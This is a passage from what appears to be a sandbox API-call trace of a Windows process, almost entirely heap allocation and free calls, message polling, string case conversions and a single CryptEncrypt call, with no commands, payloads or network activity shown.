(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.449] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.449] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0251.449] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.449] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.450] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.450] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.450] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.450] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0251.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.450] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0251.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0251.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0251.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0251.456] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.458] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.459] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0251.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0251.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0251.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.460] 